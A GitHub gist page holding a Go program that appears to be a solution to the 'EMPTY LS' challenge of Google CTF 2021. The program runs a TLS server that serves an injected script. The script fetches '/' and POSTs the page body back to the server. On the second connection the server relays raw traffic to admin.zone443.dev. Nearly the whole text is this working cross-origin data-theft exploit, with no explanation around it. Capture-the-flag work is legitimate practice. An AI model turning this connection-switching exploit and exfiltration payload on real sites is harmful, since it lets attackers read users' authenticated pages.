Last active
July 26, 2021 11:18
-
-
Save superfashi/5ad6d7ea91357611fb7b2fb64138fc43 to your computer and use it in GitHub Desktop.
EMPTY LS, Google CTF 2021
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import ( | |
"crypto/tls" | |
"fmt" | |
"io" | |
"io/ioutil" | |
"net" | |
"net/http" | |
"sync" | |
log "github.com/Sirupsen/logrus" | |
) | |
type fakeListener struct { | |
conn <-chan net.Conn | |
addr net.Addr | |
} | |
func (f *fakeListener) Accept() (net.Conn, error) { return <-f.conn, nil } | |
func (f *fakeListener) Close() error { return nil } | |
func (f *fakeListener) Addr() net.Addr { return f.addr } | |
// language=html | |
const payload = `<script> | |
fetch(new Request('/')).then(resp => resp.text()).then(function (body) { | |
return fetch(new Request('/', { | |
method: "POST", | |
body: body, | |
})); | |
}); | |
</script>` | |
func handle(writer http.ResponseWriter, request *http.Request) { | |
log.Info("url ", request.URL) | |
if request.Method == http.MethodPost { | |
all, err := ioutil.ReadAll(request.Body) | |
if err != nil { | |
log.Error(err) | |
return | |
} | |
fmt.Println(string(all)) | |
_, _ = writer.Write(nil) | |
} else { | |
_, err := io.WriteString(writer, payload) | |
if err != nil { | |
log.Error(err) | |
} | |
} | |
} | |
func redirect(conn net.Conn) { | |
defer conn.Close() | |
dial, err := net.Dial("tcp", "admin.zone443.dev:443") | |
if err != nil { | |
log.Println(err) | |
return | |
} | |
log.Info("start copying...") | |
var wg sync.WaitGroup | |
wg.Add(2) | |
defer wg.Wait() | |
go func() { | |
defer wg.Done() | |
if _, err := io.Copy(dial, conn); err != nil { | |
log.Error(err) | |
} | |
}() | |
go func() { | |
defer wg.Done() | |
if _, err := io.Copy(conn, dial); err != nil { | |
log.Error(err) | |
} | |
}() | |
} | |
func main() { | |
cert, err := tls.LoadX509KeyPair("fullchain.pem", "privkey.pem") | |
if err != nil { | |
log.Panic(err) | |
} | |
config := &tls.Config{Certificates: []tls.Certificate{cert}} | |
listen, err := net.Listen("tcp", "0.0.0.0:443") | |
if err != nil { | |
log.Panic(err) | |
} | |
defer listen.Close() | |
ch := make(chan net.Conn) | |
listener := &fakeListener{conn: ch, addr: listen.Addr()} | |
go func() { | |
log.Fatal(http.Serve(listener, http.HandlerFunc(handle))) | |
}() | |
var count int | |
for { | |
conn, err := listen.Accept() | |
log.Info("new connection...") | |
if err != nil { | |
log.Panic(err) | |
} | |
count++ | |
if count == 2 { | |
go redirect(conn) | |
} else { | |
ch <- tls.Server(conn, config) | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment